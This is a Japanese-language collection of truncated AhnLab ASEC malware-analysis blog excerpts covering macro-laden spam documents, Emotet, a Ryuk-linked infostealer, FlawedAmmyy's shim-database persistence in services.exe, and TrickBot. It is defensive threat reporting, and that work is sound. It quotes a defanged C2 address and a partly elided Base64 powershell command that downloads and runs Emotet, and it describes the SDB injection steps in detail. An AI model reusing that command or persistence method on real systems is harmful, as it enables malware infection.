マルウェアの情報

「給与明細書」メールで拡散しているExcel文書に注意

10月17日から国内企業をターゲットにダウンローダーのマルウェアを拡散させるスパムメールが多数出回っており、ユーザーの注意が必要である。 現在確認されている国内企業をターゲットとして出回っているスパムメールの件名は「10月給与明細書」と「XX見積書」である。このスパムメールは「QF001_1093_101819.xls」、「P001_102019_4472.xls」のようなファイル名のMicrosoft Office Excel文書のファイルを添付、もしくはOneDriveに偽装したフィッシングページからダウンロードさせる。メールの送信者は「キム・ソナ」であり、送信者とメール件名の内容は異なる可能性が高い。 不正Excel文書を開くと次のような画面が表示され、ユーザーによるマクロの有効化を誘導する。マクロの有効化を許可した場合、内部に含まれている不正なマクロが実行される。 マクロの有効化を誘導する画像マクロを有効化すると、不正なマクロの実行以外にも上記のようなロード画面が表示される Excel文書に含まれているマクロコードの機能は、不正なDLLをドロップした後にロードして実行する方式である。 以降、不正なDLLをロードして実行するルーティンが継続する。すなわち、実際の不正な行為はexcel.exeプロセスに(内部の不正なdll)よって行われる。マルウェアはx86、x64環境に応じてそれぞれ異なるバージョンのDLLをドロップおよびロードするが、実際の機能は同じである。  DLLマルウェアはC2に接続してコンピュータ名、ユーザー名、OSバージョンおよびアーキテクチャ等の基本情報を送信した後、ダウンローダーの機能を実行することができる。現在、以下のC2への接続は不可能であり、ダウンロードされるマルウェアは確認できない。 C&Cサーバー:https://windows-wsus-update[.]com/f1711 正常なC2への接続が行われた場合、ダウンロードされるマルウェアを実行する方式以外にも、別のプロセスにインジェクションする機能も存在する。すなわち、excel.exe内部で実行されるダウンロードマルウェア以外に、別のマルウェアも他の正常なプロセス内で実行される場合がある。 アンラボは、スパムメールとして出回っている不正なドキュメントファイルとダウンロードされる実行ファイルを、次のように診断している。また、不正Wordファイルがアクセスする不正なC&CアドレスをASDネットワークを通して遮断している。…

[注意] 文書形式で拡散するエモテット(Emotet)マルウェア

AhnLab ASEC分析チームは、国内ユーザーをターゲットとした不正なVBAマクロが含まれているWordファイルが出回っていることを確認した。この不正なVBAマクロは、WMIによってpowershellを実行し、Emotetマルウェアをダウンロードさせる。Wordファイルを開くと、[図1]のようにVBAマクロを実行するように誘導するメッセージの画像が存在する。誘導メッセージは[図2]のように様々な形式のものが出回っている。   現在出回っているVBAマクロは[図3]のようにダミーコードおよびコメントを利用して難読化されており、[図4]は難読化が解除されたVBAマクロである。    コードを分析した結果、昨年の11月にEmotetマルウェアを含んだVBAマクロはcmdによってpowershellを実行していた一方で、現在拡散しているマクロはWMI(winmgmts:Win32_Process)によってpowershellを実行する方式に変更されたことを確認した。 WMIによって実行されるpowershellコマンドは[表1]のようにBase64でエンコードされた形式であり、デコードされたコマンドは[図6]の通りである。このコマンドは5つのURLのうちアクセス可能なURLを通してEmotetマルウェアをダウンロードし、UserProfileパスに77.exeというファイル名で保存して実行する機能を遂行する。この機能は、当社のセキュリティソフトの行為検出によってブロックされる。 powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALg…(省略)…ABiADUAMQAwADYAYgBjADQAMABjADcANAA9ACcAeABjADEAYwAxADAAeAAyADgAOAAwADMANgAnAA== [表1] エンコードされたpowershellコマンド ダウンロードされたEmotetマルウェアは、「–XXXXXXXX」形式の引数値によって実行されることが特徴である。引数値はファイルパスをもとに計算され、当該引数値が存在しない場合、再度実行する。…

Ryukと類似したマルウェアに含まれたAhnLab文字列の意味!(特定国がターゲット?)

AhnLab ASEC分析チームは最近、「AhnLab」の文字列を含む情報流出マルウェアが拡散していることを確認した。このマルウェアには従来の Ryuk ランサムウェアと同じ文字列が使用され、内部コードのフローが類似しており、Ryuk ランサムウェアと関連しているものと把握されている。また、当該サンプルを分析した結果、特定国をターゲットにして製作されたマルウェアと推定されるいくつかの根拠が発見された。 昨年8月に発見された Ryuk ランサムウェアは、ファイルの拡張子を「.RYK」に変更して「RyukReadMe.txt」という名前のランサムノートを生成し、AhnLab フォルダを暗号化対象から除外している。この情報流出マルウェアも、ファイル名およびフォルダ名に AhnLab 文字列が存在する場合、流出対象から除外している。 マルウェアを実行すると、引数で与えられた文字列のパスのファイルを削除する。自身をドロップしたファイルを削除して追跡を困難にする用途に使用されることがある。…

Ammyyハッキングツールにおいて確認されたShim Database(SDB)インジェクション攻撃

ASECは、FlawedAmmyyバックドアからClopランサムウェアまでのフローの確認中に珍しい方式の攻撃手法を確認したため、共有する。 Ammyyバックドアは過去のブログ(https://asec.ahnlab.com/1237)で言及したとおり、社会工学的な方法で開始され、ダウンローダーを経て最終的にバックドア型マルウェアがインストールされる方式で作動する。以降、一種の潜伏期間を経てCLOPランサムウェアがインストールされ、ユーザーのシステムを暗号化するが、Ammyyバックドアが生成したマルウェアのうちWindowsアプリケーションのShim Database、すなわちsdbファイルを悪用して、システムに別のバックドアをユーザーが認識しづらい方式でインストールされる種類のマルウェアが確認された。loader32.exe等の名前で生成されるInjectorマルウェアとsdb_msf_32_crypted.dll等の名前で生成される不正なsdbインストール機能を持つマルウェアである。 sdbファイルはWindows OS環境におけるソフトウェアに対する下位互換をサポートするための用途で作られたメカニズムとして、様々な形態のCompatibility Fixを使用できる。アプリケーションがDLLを呼び出して使用するとき、その中間でsdbファイルのコードを通して修正され、作動する方式である。マルウェアは、このような正常な目的により提供されたアプリケーションのパッチメカニズムを悪用して作動する。  このマルウェアのフローを簡単に整理すると、以下の通りとなる。 1.Ammyyバックドアがloader32.exeとsdb_msf_32_crypted.dllを生成する。2.loader32.exeがsdb_msf_32_crypted.dllを直接ロード、または他のプロセスにインジェクションする。3.loader32.exeはエンコードされたバックドアPEを特定レジストリに書き込む。4.以降、不正なsdbファイルを生成してsdbinst.exeを利用し登録する。このsdbファイルの対象はservices.exe、具体的にはこのプログラムの関数であるScRegisterTCPEndpoint()である。5.システムの再起動時、services.exeが実行され、このとき登録した不正なsdbが適用される。6.関数ScRegisterTCPEndpoint()は、services.exeの初期ルーティンで実行される。すなわち、services.exe実行後にservices.exeのパッチされたシェルコードがすぐ実行される。7.シェルコードはエンコードされたバックドアPEが含まれたレジストリを読み、復号した後にメモリ上で実行する。8.最終的に、再起動するたびにservices.exe内部にはバックドア型マルウェアが作動するようになる。 上記のとおり、このマルウェアはまずエンコードされた実際のバックドア型マルウェアを以下のようなレジストリに書き込む。 エンコードされたバックドアが登録されるレジストリ:HKLM\SOFTWARE\Microsoft\[ランダム] 以降、不正なsdbファイルを生成してsdbinst.exeユーティリティプログラムを利用し、このsdbファイルを登録する。このようにして登録されたsdbファイルは、C:\Windows\AppPatch\Customというパスに保存される。 不正なsdbファイルは対象となるプロセスがservices.exeであり、特定のオフセットを内部に含むシェルコードに置き換える機能を持っている。この方式は、Shimによって公式的にサポートされている機能ではなく、具体的に特定アドレスのメモリをパッチする目的でマルウェアの製作者が直接実装してsdbファイルを生成する。 この特定オフセットは、services.exeの内部関数であるScRegisterTCPEndpoint()関数として、services.exeの実行中にこの関数を呼び出すと、この関数の代わりにシェルコードが実行される方式である。シェルコードは過去にレジストリに登録したエンコードされたPEをデコードして、メモリ上で実行させる。…

Word文書ファイルとJavaScript形態で拡散するTrickBot

最近、韓国の国内企業から難読化されているスクリプトのサンプルが確認された。これは、2019年初頭から海外で大量に出回っている Trickbot ダウンローダーであり、マクロを使用する文書ファイルの内部に JavaScript ファイルが内蔵されており、これを実行すると JavaScript が不正な実行ファイルをダウンロードする形式である。 1.     文書形式で拡散 Word 文書を開くと、以下の…